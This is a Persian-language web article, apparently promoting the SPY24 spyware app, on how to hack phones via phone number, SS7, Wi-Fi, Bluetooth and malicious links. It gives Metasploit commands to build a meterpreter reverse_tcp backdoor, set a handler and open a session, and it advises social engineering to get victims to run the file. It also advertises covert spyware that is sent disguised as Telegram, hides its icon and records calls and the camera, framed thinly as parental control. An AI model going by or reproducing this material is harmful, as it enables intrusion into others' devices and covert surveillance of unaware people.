اخبار هک و امنیت - آخرین و جدیدترینآموزش شناخت انواع هک و روش های مقابلهآیا اینستاگرام من هک شده است؟!امنیت سایبری (Cyber Security)برنامه های هک گوشی برای اندروید و ایفونبهترین برنامه های هک گوشی اندرویدی آیفونکنترل گوشی از راه دور برنامه برای کنترل اعضای خانوادههک آیفونهک تلگرام و نظارت بر عملکرد

هک از طریق شماره تلفن چگونه انجام می شود؟

هک از طریق شماره تلفن چگونه انجام می شود؟ , هک شماره تلفن , هک گوشی , نرم افزار هک گوشی , برنامه کنترلی SPY24 هک گوشی موبایل چگونه می توان هک شماره تلفن یک شخص را انجام داد؟

هک از طریق شماره تلفن یا هک گوشی موبایل با شماره از عباراتی هستند که معمولا زیاد آنها را می شنویم و عده ای را نیز دیده ایم که به دنبال کشف روشی برای هک از طریق شماره تلفن دیگران هستند.

اما سوالی که پیش می آید این است که چگونه می توان این کار را انجام داد؟ آیا اصلا این کار ممکن است؟

هک از طریق شماره تلفن چگونه انجام می شود؟ , هک شماره تلفن , هک گوشی , نرم افزار هک گوشی , برنامه کنترلی SPY24

قبل از پاسخ به این سوال، باید بدانید که احتمالا شما و بسیاری از کسانی که به دنبال روشی برای هک گوشی دیگران هستند، با مفهوم دقیق هک و هک گوشی آشنا نیستید و تنها یک عبارت را بارها و بارها شنیده و یا تکرار نموده اید.

در این نوشته قصد داریم به طور کامل به بررسی معنی عبارت هک گوشی بپردازیم و در ادامه ببینیم که چگونه می شود هک از طریق شماره تلفن و به طور کلی هک گوشی را انجام داد.

آیا هک گوشی موبایل امکان پذیر است؟

محتوا پنهان

در پاسخ به سوال بالا بدون این که بخواهیم شما را گیج کنیم باید بگوییم که بله، امروزه هک هر نوع دستگاه الکترونیکی امکان پذیر است و گوشی های موبایل نیز از این قاعده مستثنی نیستند.

با پیشرفت فناوری و آمدن نرم افزار هک گوشی به بازار هک کردن موبایل نیز به امری ساده تبدیل شده که هرکسی حتی بدون داشتن دانش خاصی می تواند هک گوشی را به راحتی انجام دهد.

متاسفانه عده ای با نصب برنامه هایی برای هک گوشی دست به نقض آشکار حریم خصوصی دیگران می زنند که چنین کاری از نظر ما پسندیده نیست اما استفاده از نرم افزار های هک و کنترل که برای نظارت بر فرزندان طراحی شده است را به شدت به والدین توصیه می کنیم، زیرا که تصویر کاملی از هرآنچه که فرزند شما در ذهن دارد را به شما می دهد.

پیش از این در مطلب بهترین برنامه های هک ، نرم افزارهای هک گوشی معروف در دنیا را معرفی و نحوه استفاده از آن ها را توضیح داده ایم، اما علاوه بر استفاده از نرم افزارهای هک گوشی، روش های دیگری نیز برای این کار وجود دارد که البته هر کدام از این روش ها نیازمند داشتن دانش و یا ابزارهایی خاص هستند.

در ادامه برای آشنایی شما با روش های مختلف هک گوشی تعدادی از آن ها را معرفی نموده و چگونگی انجام هک از طریق شماره تلفن را به طور مفصل توضیح خواهیم داد.

معرفی روش های هک گوشی

هک گوشی از طریق وای فای یکی از محبوب ترین روش های هک سیستم های هوشمند، استفاده از نقاط اتصال وای فای می باشد.

این حمله بیشتر در مکان هایی رخ می دهد که در آن وای فای رایگان یا عمومی وجود دارد. در این نوع حمله، هکر با بهره گیری از نرم افزارهای خاص، در شبکه وای فای ظاهر می شود و برای سایر کسانی که در آن شبکه هستند پیام هایی ارسال می کند و از طریق این پیام ها آسیب پذیری مناسب را پیدا کرده و دستگاه مورد نظر خود را هک می کند.

برنامه هایی مانند Droidsheep از جمله برنامه هایی هستند که به طور خاص برای شنود ترافیک شبکه از آن بهره می گیرند و معمولا در شبکه های وای فای عمومی، مورد استفاده هکرها قرار می گیرند تا بتوانند به تمامی پیام های ارسالی در کانال دسترسی پیدا کرده و در نهایت پیام های رمز نشده را دریافت کنند.

هک گوشی با کالی لینوکس نسخه ای از سیستم عامل لینوکس است که توسط متخصان امنیتی برای انجام عملیات تست نفوذ و جرم یابی قانونی دیجیتال یا توسط هکرها برای انجام عملیات نفوذ، هک و کرک به کار برده می‌شود. کالی لینوکس حاوی بیش از ۳۰۰ برنامه تست نفوذ نصب شده با هدف تست نفوذ و شناسایی نقاط آسیب‌پذیر انواع سیستم‌های کامپیوتری می‌باشد.

باید بدانید که با لینوکس تنها می توان هک گوشی اندرویدی انجام داد.

در ادامه به آموزش هک گوشی با کالی لینوکس خواهیم پرداخت.

برای این که هکر بتواند گوشی اندرویدی را هک نماید، ابتدا باید نسخه کالی لینوکس را روی سیستم خود نصب کند. بعد از نصب آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند. با استفاده از این ابزار، هکر شروع به ساخت یک برنامه هک اندروید به صورت APK می نماید. برای ساخت چنین ابزاری هکر فقط باید دستور زیر را در محیط ترمینال لینوکس وارد کند.

در دستور فوق هکر به جای عبارت LHOST می تواند از آدرس آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است که هکر آن را می سازد تا با آن بتواند گوشی اندرویدی را هک کند.

بعد از انجام مراحل بالا باید تعدادی از دستورات مختلف را وارد ترمینال نماید.

در این مرحله کار تقریبا تمام است و هکر باید به طریقی فرد موردنظر خود را مجاب کند تا برروی برنامه ای که ساخته است، کلیک کند. پس از کلیک فرد قربانی تمام اطلاعات موجود در گوشی او برای هکر ارسال می شود.

همانطور که مشاهده کردید در این روش هکر نیازی به یادگیری برنامه نویسی و استفاده از آن ندارد و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس گوشی اندروید موردنظر خود را هک نماید.

نرم افزار SPY24 جاسوسی شنود صدا و برنامه هک از راه دور همراه

نرم افزار SPY24 جاسوسی شنود صدا و برنامه هک از راه دور همراه

هک از طریق شماره تلفن

این که آیا هک از طریق شماره تلفن امکان پذیر است یا خیر، سوالی است که در ذهن بسیاری از افرادی که قصد انجام این کار را دارند ایجاد می شود. در پاسخ به این سوال باید بگوییم که بله، هک از طریق شماره تلفن امکان پذیر است و تا به حال افراد زیادی درگیر این موضوع بوده اند و هستند، که به نتایج قابل توجهی نیز در این حیطه رسیده اند.

هک از طریق شماره تلفن از سرویس شبکه تبادل به اسم Signalling System No. 7 -SS7 – استفاده می‌کند که در انگلستان C7 و در آمریکا CCSS7 نامیده می‌شود و به‌عنوان واسطه بین شبکه‌های تلفن همراه عمل خواهد کرد.

هنگام برقراری تماس یا فرستادن پیام‌های متنی در شبکه SS7، جزییاتی مانند شماره، انتقال پیام، پرداخت صورت‌حساب و سایر اقدامات، یک شبکه یا تماس‌گیرنده را به دیگری وصل می‌کند.

با هک کردن از طریق سیستم SS7 و با استفاده از شماره تلفن فرد مورد نظر، یک مهاجم می‌تواند مکان شخص را از طریق تلفن همراه ردیابی کند، پیام‌های فرستاده‌شده و دریافت‌شده را بخواند و تماس‌های تلفنی را گوش دهد و آنها را ضبط کند و اطلاعات دیگر گوشی تلفن همراه را بدست آورد.

این آسیب پذیری بر روی تلفن گوشی همراه شما نیست و در واقع در زیرساختارهای مخابراتی و تلفنی وجود دارد ، نصب کردن یا جلوگیری از نصب هرگونه نرم افزار بر روی گوشی نمی تواند در روند کاری این آسیب پذیری مشکلی ایجاد کند ، در واقع این شبکه Mobile است که هک می شود نه گوشی تلفن همراه شما ، قطعا شما با شنیدن این موضوع هم وحشت زده می شوید و هم خشمگین ، چراکه بدون اینکه بدانید ممکن است از تلفن همراه شما جاسوسی شده باشد.

نوهل کارشناس زبده آلمانی در ادامه سخنانش اعلام کرد که با این روش تقریبا همه تلفن های همراه را می توان هک کرد ، فارق از اینکه شما از چه برندی استفاده می کنید. هکر می تواند با استفاده از این روش حسابهای بانکی شما ، تمام اطلاعات گوشی شما . موقعیت مکانی شما . حسابهای ایمیلی و .. شما را هک کند زیرا اکثر مکانیزم های امنیتی Two Factor Authentication یا احراز هویت دو منظوره از تلفن همراه برای اینکار استفاده می کنند.

آموزش هک از طریق شماره تلفن

تا به اینجا متوجه شدید که امکان هک گوشی از طریق شماره تلفن وجود دارد، اما سوالی که پیش می آید این است که چگونه می توان این کار را انجام داد و چه روش هایی برای هک از طریق شماره تلفن وجود دارد؟

برای آموزش هک شماره و انجام این کار روش های زیادی وجود دارد که البته بیشتر آنها نیازمند یادگیری زبان های برنامه نویسی و آموزش هک حرفه ای هستند. فراگیری زبان های برنامه نویسی اصلا کار ساده ای نیست و به زمان زیادی نیاز دارد که به همین دلیل هم بسیاری از افراد از این کار منصرف می شوند. اما خوشبختانه برنامه نویسان حرفه ای در سطح دنیا نرم افزارهایی را برای هک گوشی طراحی و در اختیار عموم قرار داده اند که با استفاده از آنها به راحتی می توان به هک گوشی دیگران پرداخت.

برنامه spy24 نیز یکی از برنامه هایی است که با هدف نظارت بر فرزندان در فضای مجازی توسط سامانه کنترل فرزند طراحی و عرضه شده است. این برنامه در چند نسخه با قابلیت های متفاوت ارائه شده است که هک گوشی را هم با دسترسی و هم بدون دسترسی و از طریق شماره تلفن برای شما انجام می دهد.

آسیب پذیری  که با برنامه SS7 SPY24 انجام می شود، تقریبا جدید است و در آگوست ۲۰۱۵ این آسیب پذیری گزارش شده است ، جالب اینجاست بدانید که این آسیب پذیری در زیرساخت مخابراتی وجود دارد که در بیش از ۸۰۰ شرکت ارتباطی در دنیا مورد استفاده قرار می گیرد.

برنامه کنترلی SPY24

در صورتی که بخواهید به تک تک قسمت های تلفن همراه فرزند خود دسترسی داشته باشید کار برای شما بسیار سخت خواهد شد چرا که برای دسترسی به هر بخش مثلا پیامک ها، فایل ها، گالری، پیام های هر یک از شبکه های اجتماعی می بایست یک روش یا نرم افزار را پیاده کنید. اما با دانلود برنامه هک گوشی و نظارت بر فرزندان SPY24 دیگر نیازی به آموزش هک شماره و قسمت های مختلف گوشی را ندارید و امکان هک و کنترل تمام گوشی فرزند شما فقط با نصب یک برنامه در گوشی او وجود دارد.

با استفاده از این برنامه می توانید نظارت کاملی بر فعالیت های فرزندتان داشته باشید. این برنامه به شما امکان ردیابی نامحسوس، مشاهده پیامک های دریافتی و ارسالی، لیست تماس ها، مخاطبین و تمام تصاویر موجود در گالری را می دهد.

این برنامه در دو نسخه ساخته شده است :

۱-نسخه اول را میتوان بروی گوشی فرزند نصب کرد و به محض اتمام فرایند نصب آیکون مخفی خواهد شد که باهوشترین فرزندان هم قادر به پیدا کردن آن نمیباشند .

۲- نسخه دوم نرم افزار هک گوشی SPY24 این است که والدین با استفاده از شماره موبایل و سریال گوشی اقدام به نظارت برگوشی فرزندان خود کنند تا به راحتی در برابر خطرات اجتماعی جلوگیری کنند.

همچنین در آخرین نسخه این برنامه که با نام SPY24 منتشر شده است، شما می توانید نرم افزار را با آیکون دلخواه خود مثلا تلگرام بدون فیلترشکن برای فرزندتان ارسال کنید و از او بخواهید تا برروی لینک ارسالی شما کلیک نماید. به محض کلیک فرزند، نرم افزار به طور خودکار نصب شده و سپس از لیست برنامه های موبایل او پنهان می شود تا فرزندتان متوجه عملکرد برنامه نشود. با استفاده از این نسخه شما در واقع هک با لینک را انجام داده اید. قابلیت های منحصر به فردی که در این نسخه به برنامه اضافه شده است، قابلیت شنود مکالمات و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند می باشد.

برای دانلود برنامه هک و دریافت فیلم آموزش نصب آن می توانید بر روی لینک قرمز رنگ زیر کلیک نمایید.

هک شماره موبایل با نرم افزار spy24

هک گوشی اندروید ، نرم‌افزار کنترل والدین ، هک گوشی از راه دور ، هک گوشی آیفون

هک گوشی اندروید ، نرم‌افزار کنترل والدین ، هک گوشی از راه دور ، هک گوشی آیفون

برنامه کنترلی SPY24

هک گوشی از طریق بلوتوث

استفاده از بلوتوث یکی دیگر از روش های هک گوشی می باشد. بلوتوث جزء اولین قابلیت هایی است که در گوشی های نه چنندان هوشمند قرار داده شد و تاکنون نیز تمام گوشی ها و دستگاه های هوشمند از این فناوری بهره میگیرند. امروزه از بلوتوث بیشتر برای اتصال دستگاه های همجوار و گجت ها به گوشی موبایل استفاده می شود. بلوتوث به همان اندازه که کاربردی است به همان اندازه نیز ناامن است. حملات مبتنی بر بلوتوث آنقدر زیاد هستند که خود دسته بندی های مختلفی را شامل می شوند و اخیرا یک روش خاص برای هک از طریق بلوتوث نیز کشف شده است.

  • Bluejacking: حمله ای است که در آن هکر فقط می تواند تعداد بی شمار درخواست به گوشی شما ارسال کند و در نقش اسپم ظاهر شود.
  • Bluesnarfing: در این حمله نیز هکر با بهره گیری از نرم افزارهای خاص مانند Bluetooth OBEX به اطلاعات گوشی شما می تواند نفوذ پیدا کند.
  • Bluebugging: حمله ای خطرناک است که امروزه اکثر گوشی های موبایل به روش مقابله با آن مجهز شده اند. در این حمله هکر می تواند کنترل همه یا قسمتی از گوشی را بدست بگیرد.
  • نرم افزار هک گوشی

هک کردن شماره موبایل چگونه ممکن است ؟

همانطور که می دانید این روزها تمام مردم دنیا از فقیر تا پولدار، فرزندان تا والدین همه از تلفن های هوشمند استفاده میکنند و آن را وارد زندگی روزمره خود کرده اند.

میزان شیوع این گوشی ها در سطح جهان از کامپیوترها فزونی گرفته است. از همین رو اگر شخصی قرار است مورد حمله و سرقت اطلاعات قرار گیرد، تلفن همراه او بهترین وسیله خواهد بود. اما سوالی که این روزها برای کسانی که می خواهند به اطلاعات دیگران دست پیدا کنند و یا به عبارتی دیگران را هک کنند پیش می آید، این است که چه روش هایی برای این کار وجود دارد و آیا هک کردن شماره تلفن همراه ممکن است ؟

در ادامه این مطلب قصد داریم درباره روش های هک گوشی صحبت کرده و امکان پذیر بودن یا نبودن هک کردن شماره تلفن را بررسی کنیم.

روش های مختلف هک گوشی

اکثر افراد آشنایی زیادی با واژه هک ندارند، با این حال علاقه زیادی دارند که به علت های شخصی به اطلاعات دیگران دست پیدا کنند. شما می توانید به مطالعه مطالب پیشین ما  که در رابطه با انواع عمل هک و هکرهای مختلف می باشد بپردازید .

پس از اینکه دانستید هکرها چه کسانی هستند و شناسایی اهداف آن ها برای چیست ، نوبت به شناسایی روش های هک و نفوذ به دستگاه های مختلف مانند گوشی ها می باشد.

روشی که بیشتر برای هک گوشی استفاده می شود دسترسی به گوشی و اطلاعات فرد قربانی از طریق شبکه یا اینترنت می باشد.

از این طریق هکر با استفاده از یک برنامه یا لینک های آلوده، اقدام به هک گوشی فرد می نماید. انواع روش های هک گوشی در ادامه ذکر شده است.

هک گوشی با استفاده از لینک های آلوده

روش دیگری برای هک گوشی و نفوذ به آن، راغب کردن کاربر قربانی به کلیک بروی لینک های آلوده است. هکر با استفاده از روش های مختلف، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند.

برای مثال هکر با وعده هایی  توخالی و وسوسه انگیز نظیر نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی، برای کاربر به نوعی دام پهن می نماید و از آن طریق کاربر را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات کاربر خواهد نمود.

هک با استفاده از IP و بطور مستقیم

یکی از سخت ترین روش های هک گوشی که هکرهای معمولی قادر به انجام آن نیستند، روش هک به صورت مستقیم و بدون استفاده از برنامه ای خاص می باشد.

هکرهایی که از این روش استفاده می کنند از دانش برنامه نویسی بسیار بالایی بهره مند هستند که با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، به موبایل قربانی در شبکه متصل می شوند و سپس آن را هک می کنند.

از آنجایی که این هکرها دانش بالایی در این زمینه دارند، می دانند که تلفن همراه فرد قربانی از چه قسمت هایی آسیب پذیر می باشد و از همان قسمت ها استفاده کرده و به دستگاه نفوذ می کنند.

هک کردن شماره موبایل چگونه ممکن است ؟
هک از طریق شماره تلفن چگونه انجام می شود؟ 8

هک گوشی با کالی لینوکس

هکرها به راحتی می توانند گوشی موبایل شما را با استفاده از کالی لینوکس هک نمایند، اکنون این روش را برای شما توضیح خواهیم داد تا ببینید هکرها چگونه به سادگی تلفن شما را هک می کنند و بتوانید از هک گوشی خود جلوگیری نمایید.

در اولین مرحله هکر سیستم کالی لینوکس خود را باز می کند، سپس وارد محیط ترمینال لینوکس می شود. بعد از آن برای وارد شدن به محیط متاسپلوییت دستور msfconsole را وارد می کند.

در مرحله دوم با استفاده از دستور

msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X >

Desktop/Backdoor.exe به جای آدرس آی پی LHOST آدرس آی پی سیستم خود را قرار می دهند.

با انجام این مرحله هکر می تواند یک در پشتی در سیستم کالی لینوکس بسازد.

اکنون باید فرد مورد نظر خود را ترغیب کند که روی فایل ساخته شده کلیک نماید.

هکرها این کار را با استفاده از شیوه های مهندسی اجتماعی انجام می دهند و معمولا هم موفق می شوند که قربانی را وادار به کلیک برروی فایل ایجاد شده کنند.

بعد از انجام مراحل بالا هکر در همان خط فرمانی که هست دستور

use exploit/multi/handler را وارد می کند.

و سپس خط جدید دستور set payload windows/meterpreter/reverse_tcp را نیز وارد می کند.

حال همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار می دهد. بعد از اتمام این مراحل عبارت exploit -j –z را وارد نموده تا ماژول handler شروع به کار کند.

زمانی که شما به عنوان قربانی برنامه ای که هکر ساخته است را اجرا نمایید در محیط متااسپلوییت یک آلارم با موضوع این که یک نشست جدید در برنامه ایجاد شده است نمایش داده می شود.

هکر برای ایجاد ارتباط با این نشست دستور sessions -i 1 را وارد می کند.

اکنون دیگر کار تمام است و اولین نشست هکر با دستگاه شما برقرار می شود.

بعد از این مرحله هکر به تمام اطلاعات شما دسترسی پیدا کرده و می تواند هر فایلی را که بخواهد باز کرده و ببیند.

هک گوشی با استفاده از برنامه های جاسوسی

برنامه جاسوسی که به گفته اکثر کاربران  برنامه هک نام گذاری شده است این نوع از برنامه ها به صورت  یک نرم افزار مفید و یا بصورت یک برنامه کاملا مخفی در گوشی کاربر شروع به فعالیت می کنند.

نام علمی نرم افزار های جاسوسی تروجان است که این نام از افسانه اسب تروا گرفته شده است. این نوع از برنامه جاسوسی همانطور که از اسمش پیداست، ابتدا کاربر را راضی نگه میدارد و سرگرم میکند اما پس از جلب نظر کاربر و نصب روی سیستم یا گوشی تلفن همراه وی،‌ علاوه بر قابلیت یا سرگرمی که ارائه می دهد، در پشت پرده اقدام به جاسوسی نموده و اطلاعات کاربر را به مقصدی از پیش معلوم شده، مخابره می نماید. اکثر برنامه های جاسوسی به نوعی تروجان هستند و در قالب یک نرم افزار مفید، اقدام به سرقت اطلاعات می نمایند.

نوع دومی که برنامه جاسوسی دارند ، برنامه هایی خاص هستند که  فقط عمل هک و جاسوسی را انجام می دهند. از این رو کشف این برنامه ها به ظاهر ساده تر می نماید. اما این را نیز باید به یاد داشته باشید که این سری از برنامه های جاسوسی برای مخفی ماندن از دید کاربر، از یک سری شگرد هایی استفاده می نمایند که یافتن و در برخی موارد حتی پاک کردن آن ها مشکل بوده و به سادگی امکان پذیر نمی باشد. به عنوان نمونه می توان گفت تعدادی از این نرم افزار ها پس از نصب روی سیستم یا گوشی شما بلافاصله مخفی شده و در لیست نرم افزارهای نصب شده شما موجود نمی باشند. پس یافتن آن ها برای شما فوق العاده مشکل می گردد.

هک گوشی با شماره تلفن

هک کردن گوشی موبایل از طریق داشتن شماره موبایل

یکی دیگر از روش های هک گوشی، هک کردن شماره تلفن فرد قربانی می باشد. این روش هک یکی از سخت ترین روش های هک می باشد که تنها هکرهای حرفه ای از پس آن برمی آیند. اما در اینجا برای بسیاری این سوال پیش می آید که چگونه می توان هک کردن شماره تلفن را انجام داد؟ در ادامه به این سوال پاسخ خواهیم داد.

آیا هک کردن شماره امکان پذیر است ؟

هک کردن شماره موبایل اشخاص مختلف توسط روزنامه نگاران روزنامه وورلدنیوز هنوز هم بحث رسوایی بدی در انگلستان مطرح کرده است. در سال ۲۰۱۶ این روزنامه نگاران بودند که برای تهیه خبرهای دست اول با استفاده از نرم افزار و از طریق هک کردن شماره توانستند به تمام اطلاعات گوشی اشخاص مورد نظر خود برسند.

مکانیزم کاری برنامه ای که خبرنگاران از آن استفاده کردند، یک نقص امنیتی می باشد، اما این نقص اصلا پیچیده نیست. این برنامه تمامی تماس های تلفنی که به تلفن مورد نظر انجام می شود را به یک دستگاه یا سیستم ضبط صدای آنلاین هدایت یا Route می کند و سپس تماس مورد نظر را به سمت کاربر تلفن همراه مسیریابی مجدد یا Re-Route می کند و به این ترتیب یکجور حمله از نوع Man In The Middle یا MITM انجام می دهد.

نوهل کارشناس زبده آلمانی در یکی از سخنرانی هایش اعلام کرد

که با این روش هک گوشی ، همه تلفن های همراه را می توان هک کرد، فارق از اینکه شما از چه برندی استفاده می کنید.

هکر می تواند با استفاده از این روش، تمام اطلاعات گوشی از قبیل پیامکها، شنود تماسها، شبکه های اجتماعی و حتی موقعیت مکانی شما را هک کند زیرا اکثر مکانیزم های امنیتی Two Factor Authentication یا احراز هویت دو منظوره از تلفن همراه برای اینکار استفاده می کنند.

هک کردن شماره تلفن را چگونه می توان انجام داد؟

تا به اینجا متوجه شدید که امکان هک کردن شماره تلفن وجود دارد، اما سوالی که پیش می آید این است که چگونه می توان این کار را انجام داد و چه روش هایی برای هک شماره تلفن وجود دارد؟

هک موبایل با شماره تلفن از سرویس شبکه تبادل به اسم Signalling System No. 7 -SS7 – استفاده می‌کند که در انگلستان C7 و در آمریکا CCSS7 نامیده می‌شود و به‌عنوان واسطه بین شبکه‌های تلفن همراه عمل خواهد کرد.

هنگام برقراری تماس یا فرستادن پیام‌های متنی در شبکه SS7، جزییاتی مانند شماره، انتقال پیام، پرداخت صورت‌ حساب و سایر اقدامات، یک شبکه یا تماس‌گیرنده را به دیگری وصل می‌کند.

با هک کردن از طریق سیستم SS7 و با استفاده از شماره تلفن فرد مورد نظر، یک مهاجم می‌تواند مکان شخص را از طریق تلفن همراه ردیابی کند، پیام‌های فرستاده‌شده و دریافت‌شده را بخواند و تماس‌های تلفنی را گوش دهد و آنها را ضبط کند و اطلاعات دیگر گوشی تلفن همراه را بدست آورد.

این آسیب پذیری بر روی تلفن گوشی همراه شما نیست و در واقع در زیرساختارهای مخابراتی و تلفنی وجود دارد، نصب کردن یا جلوگیری از نصب هرگونه نرم افزار بر روی گوشی نمی تواند در روند کاری این آسیب پذیری مشکلی ایجاد کند، در واقع این شبکه Mobile است که هک می شود نه گوشی تلفن همراه شما.

دانلود برنامه ss7

دانلود برنامه ss7

آموزش هک کردن شماره تلفن, هک گوشی با کالی لینوکس

برای آموزش هک شماره و انجام این کار روش های زیادی وجود دارد که البته بیشتر آنها نیازمند یادگیری زبان های برنامه نویسی و آموزش هک حرفه ای هستند. فراگیری زبان های برنامه نویسی اصلا کار ساده ای نیست و به زمان زیادی نیاز دارد که به همین دلیل هم بسیاری از افراد از این کار منصرف می شوند. اما خوشبختانه برنامه نویسان حرفه ای در سطح دنیا نرم افزارهایی را برای هک گوشی طراحی و در اختیار عموم قرار داده اند که با استفاده از آنها به راحتی می توان به هک گوشی دیگران پرداخت.

برنامه spy24 نیز یکی از برنامه هایی است که با هدف نظارت بر فرزندان در فضای مجازی توسط سامانه کنترل فرزند طراحی و عرضه شده است. این برنامه در چند نسخه با قابلیت های متفاوت ارائه شده است که هک گوشی را هم با دسترسی و هم بدون دسترسی و از طریق شماره تلفن برای شما انجام می دهد.

آسیب پذیری که با برنامه SS7 spy24 انجام می شود، تقریبا جدید است و در آگوست ۲۰۱۵ این آسیب پذیری گزارش شده است ، جالب اینجاست بدانید که این آسیب پذیری در زیرساخت مخابراتی وجود دارد که در بیش از ۸۰۰ شرکت ارتباطی در دنیا مورد استفاده قرار می گیرد.

هک کردن گوشی موبایل از طریق داشتن شماره موبایل .

برنامه کنترلی spy24

در صورتی که بخواهید به تک تک بخش های گوشی موبایل فرزند خود دسترسی داشته باشید کار برای شما بسیار سخت خواهد شد چرا که برای دسترسی به هر بخش مثلا پیامک ها، فایل ها، گالری، پیام های هر یک از شبکه های اجتماعی می بایست یک روش یا نرم افزار را پیاده کنید. اما با دانلود برنامه هک گوشی و نظارت بر فرزندان spy24 دیگر نیازی به آموزش هک شماره و قسمت های مختلف گوشی را ندارید و امکان هک و کنترل تمام گوشی فرزند شما فقط با نصب یک برنامه در گوشی او وجود دارد.

با استفاده از این برنامه می توانید نظارت کاملی بر فعالیت های فرزندتان داشته باشید. این برنامه به شما امکان ردیابی نامحسوس، مشاهده پیامک های دریافتی و ارسالی، لیست تماس ها، مخاطبین و تمام تصاویر موجود در گالری را می دهد.

هک کردن گوشی موبایل از طریق داشتن شماره موبایل

هک کردن گوشی موبایل از طریق داشتن شماره موبایل

این برنامه در دو نسخه ساخته شده است :

۱-نسخه اول را میتوان بروی گوشی فرزند نصب کرد و به محض اتمام فرایند نصب آیکون مخفی خواهد شد که باهوشترین فرزندان هم قادر به پیدا کردن آن نمیباشند .

۲- نسخه دوم نرم افزار هک گوشی spy24 این است که والدین با استفاده از شماره موبایل و سریال گوشی اقدام به نظارت برگوشی فرزندان خود کنند تا به راحتی در برابر خطرات اجتماعی جلوگیری کنند.

هک گوشی با کالی لینوکس

همچنین در آخرین نسخه این برنامه که با نام spy24 منتشر شده است، شما می توانید نرم افزار را با آیکون دلخواه خود مثلا تلگرام بدون فیلترشکن برای فرزندتان ارسال کنید و از او بخواهید تا برروی لینک ارسالی شما کلیک نماید. به محض کلیک فرزند، نرم افزار به طور خودکار نصب شده و سپس از لیست برنامه های موبایل او پنهان می شود تا فرزندتان متوجه عملکرد برنامه نشود. با استفاده از این نسخه شما در واقع هک با لینک را انجام داده اید. قابلیت های منحصر به فردی که در این نسخه به برنامه اضافه شده است، قابلیت شنود مکالمات و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند می باشد.

برای دانلود برنامه هک و دریافت فیلم آموزش نصب آن می توانید بر روی لینک قرمز رنگ زیر کلیک نمایید.

هک شماره موبایل با نرم افزار spy24 ,هک گوشی با کالی لینوکس

هک کردن گوشی موبایل از طریق داشتن شماره موبایل

آیا برنامه هک از طریق شماره تلفن وجود دارد؟

یکی از عباراتی که این روزها هنگام سرچ در اینترنت زیاد با آن مواجه می شوید، دانلود برنامه هک از طریق شماره تلفن است.

شاید سوالی که پس از دیدن این عبارت در ذهن خیلی ها ایجاد می شود این باشد که آیا اصلا این کار امکان پذیر است؟

آیا اصلا نرم افزار هک گوشی وجود دارد؟ چگونه می توان هک از طریق شماره تلفن را انجام داد؟

ابتدا باید گفت که احتمالا بسیاری از شما با مفهوم دقیق هک و روش هک آشنا نیستید و این عبارت را بار ها و بارها بدون توجه به معنی آن مورد استفاده قرار می دهید.

و اما امروز ما در این مقاله درباره اینکه هک گوشی و به طور کلی هک به چه معناست و چگونه می توان دانلود برنامه هک از طریق شماره را انجام داد، به طور مفصل صحبت نموده و در پایان مطلب یکی از قدرتمندترین نرم افزارهای هک گوشی دنیا را به شما معرفی خواهیم کرد و لینک دانلود برنامه هک از طریق شماره را در اختیارتان خواهیم گذاشت.

هک چیست ؟ این روزها شاید بارها این سوال به گوشتان خورده باشد و درباره آن بحث و گفتگوها و اظهار نظرات زیادی را دیده و شنیده باشید.

شاید هم فکر می کنید که پاسخ این سوال را به خوبی می دانید و دیگر به دنبال پاسخ آن نیستید.

اما باید بدانید که هک در واقع معانی و مفاهیم مختلفی دارد که هرکدام در جای خود به کار برده می شوند و احتمالا شما با معنی و مفهوم دقیق هک آشنا نیستید و تنها یک عبارت را بارها و بارها در میان گفتگوهایتان به کار می برید.

اما واقعا هک چیست و اصلا چگونه می توان هک را انجام داد؟

اصولا چه دستگاه هایی قابل هک هستند؟

برای پاسخ این سوالات در ادامه با ما همراه باشید تا علاوه بر توضیح درباره واژه هک به معرفی و توضیح انواع هک و روش های آن به طور مفصل بپردازیم.

هک چیست ؟

به عقیده برخی از کارشناسان، پدیده هک یا نفوذ غیر مجاز از پیش از ظهور کامپیوتر ها وجود داشته و تنها مربوط به سیستم های هوشمند نمی باشد، این کارشناسان هر نوع دسترسی بدون اجازه به اطلاعات خصوصی و طبقه بندی شده را هم ردیف با هک می دانند.

به هر حال بعد از ظهور اولین کامپیوترها هک نیز شکل تازه ای به خود گرفته است.

گستردگی واژهٔ هک منحصر به رایانه نمی‌باشد و توسط افراد با تخصص‌های گوناگون در زمینه‌هایی از قبیل موسیقی، نقاشی و… نیز به کار می‌رود که به معنی دگرگونی‌های هوشمندانه و خلاقانه فرد در آن زمینه می‌باشد.

هک چیست:

هک در واقع افزایش سطح دسترسی به یک مجموعه از راه غیرمعمول یا غیرقانونی است.

ما نیز در این مطلب قصد داریم درباره هک به معنی جدید آن، یعنی نفوذ به سیستم های کامپیوتری و گوشی صحبت کنیم و اطلاعات جامعی را درباره انواع هک در اختیار شما عزیزان قرار دهیم.

بطور کلی در علوم رایانه ای، هک به معنی نفوذ یک فرد به سیستم رایانه ای بدون اجازه دسترسی به آن، می باشد.

 هکر نیز به کسی گفته می شود که بتواند چنین عملی را انجام دهد.

برنامه هک گوشی چیست؟

برنامه ای که قرار است یک گوشی موبایل (اندروید یا آیفون) را هک کند، باید بتواند دسترسی شما را به عنوان هکر به بخش های مختلف این دستگاه باز کند.

هک گوشی می تواند معانی مختلفی داشته باشد.

اما یکی از معمول ترین معانی آن عبارت است از: ایجاد دسترسی تایید نشده و بدون اجازه به تمام اطلاعات موجود در تلفن همراه دیگران.

سطح دسترسی که به گوشی موبایل فرد دیگری ایجاد شود بستگی به سطح دانش شما و یا نرم افزاری که از آن برای هک گوشی استفاده می کنید خواهد داشت.

به طورمثال شاید شما یک شخص مبتدی در زمینه هک و نفوذ باشید و هیچ دانشی در این زمینه نداشته باشید؛ در این صورت با داشتن یک ابزار یا دانلود برنامه هک از طریق موبایل می توانید به راحتی به اطلاعات دیگران نفوذ کنید.

